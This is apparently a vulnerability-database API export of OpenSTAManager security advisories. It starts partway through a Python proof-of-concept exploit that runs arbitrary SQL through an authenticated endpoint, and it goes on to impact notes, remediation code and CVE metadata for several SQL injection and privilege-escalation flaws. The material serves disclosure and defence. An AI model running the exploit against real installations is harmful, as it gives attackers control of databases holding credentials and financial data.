admin\\n\"\n \" %(prog)s -t http://target:8888 -u admin -p admin --proxy http://127.0.0.1:8080\\n\"\n \" %(prog)s -t http://target:8888 -u admin -p admin --module-id 6\\n\"\n ),\n )\n p.add_argument(\"-t\", \"--target\", required=True, help=\"Base URL (e.g. 
http://host:port)\")\n p.add_argument(\"-u\", \"--username\", required=True, help=\"Valid username for authentication\")\n p.add_argument(\"-p\", \"--password\", required=True, help=\"Password for authentication\")\n p.add_argument(\n \"--proxy\",\n default=None,\n help=\"HTTP proxy (e.g. http://127.0.0.1:8080 for Burp Suite)\",\n )\n p.add_argument(\n \"--module-id\",\n type=int,\n default=None,\n help=\"Aggiornamenti module ID (auto-detected if omitted)\",\n )\n p.add_argument(\n \"--verify-only\",\n action=\"store_true\",\n help=\"Only verify the vulnerability, do not extract data\",\n )\n return p.parse_args()\n\n\nclass OSMExploit:\n def __init__(self, args):\n self.target = args.target.rstrip(\"/\")\n self.username = args.username\n self.password = args.password\n self.module_id = args.module_id\n self.session = requests.Session()\n self.session.headers.update(DEFAULT_HEADERS)\n self.session.verify = False\n\n if args.proxy:\n self.session.proxies = {\"http\": args.proxy, \"https\": args.proxy}\n\n self.request_count = 0\n\n def login(self):\n info(\"Authenticating as '%s'...\" % self.username)\n\n # First GET to obtain a valid session cookie\n self.session.get(f\"{self.target}/index.php\")\n self.request_count += 1\n\n r = self.session.post(\n f\"{self.target}/index.php\",\n data={\"op\": \"login\", \"username\": self.username, \"password\": self.password},\n allow_redirects=False,\n )\n self.request_count += 1\n\n if r.status_code != 302:\n fail(\"Login failed (HTTP %d). 
Check credentials.\" % r.status_code)\n return False\n\n location = r.headers.get(\"Location\", \"\")\n\n # Success redirects to controller.php; failure redirects back to index.php\n if \"controller.php\" in location:\n success(\"Authenticated successfully.\")\n # Follow redirect to establish full session\n self.session.get(f\"{self.target}/{location.lstrip('/')}\", allow_redirects=True)\n self.request_count += 1\n return True\n\n # If redirected back to index.php, the login failed\n # Common causes: wrong credentials, brute-force lockout, or active session token\n fail(\"Login failed — redirected to '%s'.\" % location)\n fail(\"Possible causes:\")\n fail(\" 1. Wrong credentials\")\n fail(\" 2. Brute-force lockout (wait 3 min or clear zz_logs)\")\n fail(\" 3. Active session token (another session is open)\")\n fail(\" Tip: clear the token with SQL: UPDATE zz_users SET session_token=NULL WHERE username='%s';\" % self.username)\n return False\n\n def detect_module_id(self):\n if self.module_id is not None:\n info(\"Using provided module ID = %d\" % self.module_id)\n return True\n\n info(\"Auto-detecting Aggiornamenti module ID...\")\n # Search for the module ID in the navigation HTML\n r = self.session.get(f\"{self.target}/index.php\", allow_redirects=True)\n self.request_count += 1\n\n # Look for sidebar link: <a href=\"/controller.php?id_module=6\" ...>...<p>Aggiornamenti</p>\n\n matches = re.findall(r'id_module=(\\d+)\"[^<]*<[^<]*<[^<]*Aggiornamenti', r.text)\n if matches:\n self.module_id = int(matches[0])\n success(\"Aggiornamenti module ID = %d\" % self.module_id)\n return True\n\n # Secondary pattern: data-id attribute near Aggiornamenti text\n matches = re.findall(r'data-id=\"(\\d+)\"[^<]*onclick[^<]*id_module=\\d+[^<]*<[^<]*<[^<]*<[^<]*Aggiornamenti', r.text)\n if matches:\n self.module_id = int(matches[0])\n success(\"Aggiornamenti module ID = %d\" % self.module_id)\n return True\n\n # Fallback: try common IDs\n for test_id in [6, 7, 8, 5, 4]:\n r = 
self.session.get(\n f\"{self.target}/controller.php?id_module={test_id}\",\n allow_redirects=True,\n )\n self.request_count += 1\n if \"Aggiornamenti\" in r.text or \"aggiornamenti\" in r.text.lower():\n self.module_id = test_id\n success(\"Aggiornamenti module ID = %d\" % test_id)\n return True\n\n fail(\"Could not detect Aggiornamenti module ID. Use --module-id N.\")\n return False\n\n def execute_sql(self, queries):\n \"\"\"Execute arbitrary SQL via risolvi-conflitti-database.\"\"\"\n r = self.session.post(\n f\"{self.target}/editor.php?id_module={self.module_id}&id_record={self.module_id}\",\n data={\n \"op\": \"risolvi-conflitti-database\",\n \"queries\": json.dumps(queries),\n },\n )\n self.request_count += 1\n return r\n\n def verify(self):\n marker_table = \"poc_vuln04_verify\"\n marker_value = \"CVE_PROOF_arbitrary_sql_execution\"\n\n info(\"Step 1: Creating marker table via arbitrary SQL execution...\")\n queries = [\n f\"DROP TABLE IF EXISTS {marker_table}\",\n f\"CREATE TABLE {marker_table} (id INT AUTO_INCREMENT PRIMARY KEY, proof VARCHAR(255), ts TIMESTAMP DEFAULT CURRENT_TIMESTAMP)\",\n f\"INSERT INTO {marker_table} (proof) VALUES ('{marker_value}')\",\n ]\n r = self.execute_sql(queries)\n info(\"Response: HTTP %d\" % r.status_code)\n\n info(\"Step 2: Verifying marker table exists by reading it back...\")\n # Use a second query to read the data via a UNION or time-based approach\n # Since we can execute arbitrary SQL, we can verify by creating another\n # marker and checking via a SELECT INTO approach\n verify_queries = [\n f\"INSERT INTO {marker_table} (proof) VALUES (CONCAT('verified_', (SELECT VERSION())))\",\n ]\n r2 = self.execute_sql(verify_queries)\n\n # The JSON response may be embedded within HTML (editor.php renders the full page\n # after executing the action). 
Extract JSON from the response body.\n\n for resp in [r, r2]:\n # Try parsing as pure JSON first\n try:\n data = resp.json()\n if data.get(\"success\"):\n success(\"SQL EXECUTION CONFIRMED! Server accepted and executed arbitrary SQL.\")\n success(\"Marker table '%s' created with proof value.\" % marker_table)\n info(\"Response: %s\" % data.get(\"message\", \"\")[:200])\n return True\n except (ValueError, KeyError):\n pass\n\n # Extract embedded JSON from HTML response\n json_match = re.search(r'\\{\"success\"\\s*:\\s*true\\s*,\\s*\"message\"\\s*:\\s*\"([^\"]*)\"', resp.text)\n if json_match:\n success(\"SQL EXECUTION CONFIRMED! Server accepted and executed arbitrary SQL.\")\n success(\"Marker table '%s' created with proof value.\" % marker_table)\n info(\"Server message: %s\" % json_match.group(1)[:200])\n return True\n\n # Check for query execution indicators in response\n if \"query sono state eseguite\" in resp.text or \"query eseguite\" in resp.text.lower():\n success(\"SQL EXECUTION CONFIRMED! Server reports queries were executed.\")\n return True\n\n fail(\"Could not verify SQL execution. 
Check target manually.\")\n fail(\"Tip: use --module-id N if auto-detection failed.\")\n return False\n\n def cleanup(self):\n info(\"Cleaning up marker tables...\")\n self.execute_sql([\"DROP TABLE IF EXISTS poc_vuln04_verify\"])\n self.execute_sql([\"DROP TABLE IF EXISTS poc_vuln04_marker\"])\n self.execute_sql([\"DROP TABLE IF EXISTS poc_vuln04_tecnico\"])\n success(\"Cleanup complete.\")\n\n\n# ── Output helpers ──────────────────────────────────────────────────\n\ndef info(msg):\n print(f\"\\033[34m[*]\\033[0m {msg}\")\n\ndef success(msg):\n print(f\"\\033[32m[+]\\033[0m {msg}\")\n\ndef fail(msg):\n print(f\"\\033[31m[-]\\033[0m {msg}\")\n\n\n# ── Main ────────────────────────────────────────────────────────────\n\ndef main():\n args = parse_args()\n exploit = OSMExploit(args)\n\n if not exploit.login():\n sys.exit(1)\n\n if not exploit.detect_module_id():\n sys.exit(1)\n\n print()\n info(\"=== Vulnerability Verification ===\")\n if not exploit.verify():\n sys.exit(1)\n\n print()\n info(\"=== Cleanup ===\")\n exploit.cleanup()\n\n print()\n success(\"Verification complete. %d HTTP requests sent.\" % exploit.request_count)\n info(\n \"All traffic was sent through the configured proxy.\"\n if args.proxy\n else \"Tip: use --proxy http://127.0.0.1:8080 to capture in Burp Suite.\"\n )\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n## Impact\n\n- **Confidentiality:** Complete database exfiltration — credentials, PII, financial data, configuration secrets.\n- **Integrity:** Full control over all database tables — insert, update, delete any record. An attacker can create new admin accounts, modify financial records, or plant backdoors.\n- **Availability:** An attacker can `DROP` critical tables, corrupt data, or execute resource-intensive queries to cause denial of service.\n- **Potential Remote Code Execution:** Depending on MySQL server configuration, an attacker may be able to use `SELECT ... 
INTO OUTFILE` to write arbitrary files to the server filesystem, or use MySQL UDF (User Defined Functions) to execute operating system commands. Both paths additionally require the application's database account to hold the FILE privilege and `secure_file_priv` to permit the target directory, so a hardened database deployment limits this escalation; the database-level impact above does not depend on it.\n\n## Proposed Remediation\n\n### Option A: Remove Direct Query Execution (Recommended)\n\nReplace the arbitrary SQL execution with a predefined set of safe operations. The conflict resolution feature should only execute queries that were generated by the application itself, not user-supplied SQL. Treat the prefix allowlist sketched below as a partial mitigation only: each pattern anchors at the start of the string, so it still admits `ALTER TABLE ... DROP` against any table and any `INSERT INTO zz_*` statement (including the `zz_users` table referenced in the PoC above), and it offers no protection if the driver accepts stacked statements after a `;`. Option B below avoids these gaps by never executing client-supplied SQL:\n\n```php\ncase 'risolvi-conflitti-database':\n $queries_json = post('queries');\n $queries = json_decode($queries_json, true);\n\n if (empty($queries)) {\n echo json_encode(['success' => false, 'message' => tr('Nessuna query ricevuta.')]);\n break;\n }\n\n // ALLOWLIST: Only permit specific safe SQL patterns\n $allowed_patterns = [\n '/^ALTER\\s+TABLE\\s+`?\\w+`?\\s+(ADD|MODIFY|CHANGE|DROP)\\s+/i',\n '/^CREATE\\s+INDEX\\s+/i',\n '/^DROP\\s+INDEX\\s+/i',\n '/^UPDATE\\s+`?zz_views`?\\s+SET\\s+/i',\n '/^INSERT\\s+INTO\\s+`?zz_/i',\n ];\n\n $safe_queries = [];\n $rejected = [];\n\n foreach ($queries as $query) {\n $is_safe = false;\n foreach ($allowed_patterns as $pattern) {\n if (preg_match($pattern, trim($query))) {\n $is_safe = true;\n break;\n }\n }\n\n if ($is_safe) {\n $safe_queries[] = $query;\n } else {\n $rejected[] = $query;\n }\n }\n\n if (!empty($rejected)) {\n echo json_encode([\n 'success' => false,\n 'message' => tr('Query non permesse rilevate. 
Operazione bloccata.'),\n ]);\n break;\n }\n\n // Execute only validated queries\n foreach ($safe_queries as $query) {\n $dbo->query($query);\n }\n // ...\n```\n\n### Option B: Server-Side Query Generation\n\nInstead of accepting raw SQL from the client, have the client send operation descriptors and generate the SQL on the server:\n\n```php\ncase 'risolvi-conflitti-database':\n $operations = json_decode(post('operations'), true);\n\n foreach ($operations as $op) {\n switch ($op['type']) {\n case 'add_column':\n $table = preg_replace('/[^a-zA-Z0-9_]/', '', $op['table']);\n $column = preg_replace('/[^a-zA-Z0-9_]/', '', $op['column']);\n $type = preg_replace('/[^a-zA-Z0-9_() ]/', '', $op['datatype']);\n $dbo->query(\"ALTER TABLE `{$table}` ADD COLUMN `{$column}` {$type}\");\n break;\n // ... other safe operations\n }\n }\n```\n\n### Option C: Restrict Access (Minimum Mitigation)\n\nAt minimum, restrict this operation to admin-only users:\n\n```php\ncase 'risolvi-conflitti-database':\n if (!auth_osm()->getUser()->is_admin) {\n echo json_encode(['success' => false, 'message' => tr('Accesso negato.')]);\n break;\n }\n // ... existing code\n```\n\n**Note:** This alone is insufficient because even admin accounts can be compromised, and the feature still allows arbitrary SQL execution.\n\n### Additional Recommendations\n\n1. **Remove `SET FOREIGN_KEY_CHECKS=0`**: Foreign key checks should never be disabled based on user-initiated actions.\n2. **Sanitize error output**: Exception messages at line 79 leak database structure information. Replace with generic error messages.\n3. **Add CSRF protection**: Ensure the endpoint validates a CSRF token to prevent cross-site request forgery attacks.\n4. 
**Audit logging**: Log the actual SQL queries being executed (already partially implemented) but also log the requesting user's IP address and session.\n\n## Credits\nOmar Ramirez", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35168", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10493", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10388", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10472", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10511", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35168" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://github.com/devcode-it/openstamanager/commit/43970676bcd6636ff8663652fd82579f737abb74", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T16:19:18Z/" } ], "url": "https://github.com/devcode-it/openstamanager/commit/43970676bcd6636ff8663652fd82579f737abb74" }, { "reference_url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2", "reference_id": "", "reference_type": "", 
"scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T16:19:18Z/" } ], "url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T16:19:18Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35168", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35168" }, { "reference_url": "https://github.com/advisories/GHSA-2fr7-cc4f-wh98", "reference_id": "GHSA-2fr7-cc4f-wh98", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2fr7-cc4f-wh98" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110583?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": 
"http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10.2" } ], "aliases": [ "CVE-2026-35168", "GHSA-2fr7-cc4f-wh98" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e7y7-21j6-k7hj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/48417?format=api", "vulnerability_id": "VCID-g8ft-7f76-ebd4", "summary": "OpenSTAManager has Authenticated SQL Injection in API via 'display' parameter\nAn authenticated SQL Injection vulnerability in the API allows any user, regardless of permission level, to execute arbitrary SQL queries. By manipulating the `display` parameter in an API request, an attacker can exfiltrate, modify, or delete any data in the database, leading to a full system compromise.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-65103", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01721", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01729", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01723", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-65103" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65103", "reference_id": "CVE-2025-65103", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", 
"scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65103" }, { "reference_url": "https://github.com/advisories/GHSA-2jm2-2p35-rp3j", "reference_id": "GHSA-2jm2-2p35-rp3j", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2jm2-2p35-rp3j" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2jm2-2p35-rp3j", "reference_id": "GHSA-2jm2-2p35-rp3j", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2jm2-2p35-rp3j" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/71464?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.9.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2br1-99zg-z7bh" }, { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-7e19-24d8-f7gd" }, { "vulnerability": "VCID-7h5v-9rhe-2bbp" }, { "vulnerability": "VCID-81kx-rj8c-dkbr" }, { "vulnerability": "VCID-8x62-3aff-hbak" }, { "vulnerability": "VCID-by14-5puv-qygm" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-gnx6-chzh-3fc3" }, { "vulnerability": "VCID-nv3t-9e16-8kbn" }, { "vulnerability": "VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-pxzr-bvsj-y3gs" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-w4gk-vbbq-13ea" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": 
"http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.9.5" } ], "aliases": [ "CVE-2025-65103", "GHSA-2jm2-2p35-rp3j" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g8ft-7f76-ebd4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50054?format=api", "vulnerability_id": "VCID-gnx6-chzh-3fc3", "summary": "OpenSTAManager has a SQL Injection vulnerability in the Scadenzario bulk operations module\nCritical Error-Based SQL Injection vulnerability in the Scadenzario (Payment Schedule) bulk operations module of OpenSTAManager v2.9.8 allows authenticated attackers to extract complete database contents including user credentials, customer PII, and financial records through XML error messages.\n\n**Status:** ✅ Confirmed and tested on live instance (v2.9.8)\n**Vulnerable Parameter:** `id_records[]` (POST array)\n**Affected Endpoint:** `/actions.php?id_module=18` (Scadenzario module)\n**Attack Type:** Error-Based SQL Injection (IN clause)", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24418", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02401", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02453", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02459", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03086", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24418" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": 
"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24418", "reference_id": "CVE-2026-24418", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24418" }, { "reference_url": "https://github.com/advisories/GHSA-4xwv-49c8-fvhq", "reference_id": "GHSA-4xwv-49c8-fvhq", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4xwv-49c8-fvhq" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq", "reference_id": "GHSA-4xwv-49c8-fvhq", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-06T18:47:55Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/958981?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10-beta", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": 
"VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10-beta" } ], "aliases": [ "CVE-2026-24418", "GHSA-4xwv-49c8-fvhq" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gnx6-chzh-3fc3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50656?format=api", "vulnerability_id": "VCID-nv3t-9e16-8kbn", "summary": "OpenSTAManager affected by unauthenticated privilege escalation via modules/utenti/actions.php\nA privilege escalation and authentication bypass vulnerability in OpenSTAManager allows any attacker to arbitrarily change a user's group (`idgruppo`) by directly calling `modules/utenti/actions.php`. This can promote an existing account (e.g. agent) into the Amministratori group as well as demote any user including existing administrators.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27012", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14474", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14558", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14598", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14595", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27012" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", 
"scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27012", "reference_id": "CVE-2026-27012", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27012" }, { "reference_url": "https://github.com/advisories/GHSA-247v-7cw6-q57v", "reference_id": "GHSA-247v-7cw6-q57v", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-247v-7cw6-q57v" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-247v-7cw6-q57v", "reference_id": "GHSA-247v-7cw6-q57v", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-03-04T21:21:23Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-247v-7cw6-q57v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/958981?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10-beta", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10-beta" } ], "aliases": [ "CVE-2026-27012", "GHSA-247v-7cw6-q57v" ], "risk_score": 4.5, "exploitability": 
"0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nv3t-9e16-8kbn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50040?format=api", "vulnerability_id": "VCID-nzzy-h46k-bfcr", "summary": "OpenSTAManager has a Time-Based Blind SQL Injection with Amplified Denial of Service\nCritical Time-Based Blind SQL Injection vulnerability affecting **multiple search modules** in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attacks with **amplified execution** across 10+ modules.\n\n**Status:** ✅ Confirmed and tested on live instance (v2.9.8)\n**Vulnerable Parameter:** `term` (GET)\n**Affected Endpoint:** `/ajax_search.php`\n**Affected Modules:** Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, Interventi", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24417", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02401", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02453", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02459", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03086", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24417" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } 
